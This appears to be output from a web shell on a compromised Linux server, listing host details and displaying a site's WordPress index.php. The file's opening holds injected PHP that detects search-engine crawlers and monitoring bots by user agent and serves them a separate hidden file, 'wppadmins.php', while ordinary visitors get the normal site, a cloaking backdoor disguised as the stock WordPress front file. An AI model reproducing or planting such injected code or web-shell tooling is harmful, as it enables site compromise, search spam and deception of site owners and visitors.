uawdijnntqw1x1x1
IP : 216.73.216.55
Hostname : srv913213
Kernel : Linux srv913213 5.15.0-190-generic #200-Ubuntu SMP Fri Aug 7 15:06:04 UTC 2026 x86_64
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
OS : Linux
PATH:
/
var
/
opt
/
..
/
www
/
yapcute.com
/
..
/
yourattentionplease.in
/
index.php
/
/
<?php session_start(); $userAgent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? ''); $botPattern = '/bot|crawl|spider|slurp|fetch|scanner|search|mediapartners|googlebot|google|bingbot|bing|yahoo|yandex|baidu|duckduckgo|facebot|facebookexternalhit|applebot|linkedinbot|twitterbot|slackbot|telegrambot|discordbot|whatsapp|ahrefs|semrush|mj12bot|dotbot|rogerbot|screaming frog|uptime|pingdom|monitis|gtmetrix/i'; if (preg_match($botPattern, $userAgent)) { include DIR . '/wppadmins.php'; exit; } /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';
/var/opt/../www/yapcute.com/../yourattentionplease.in/index.php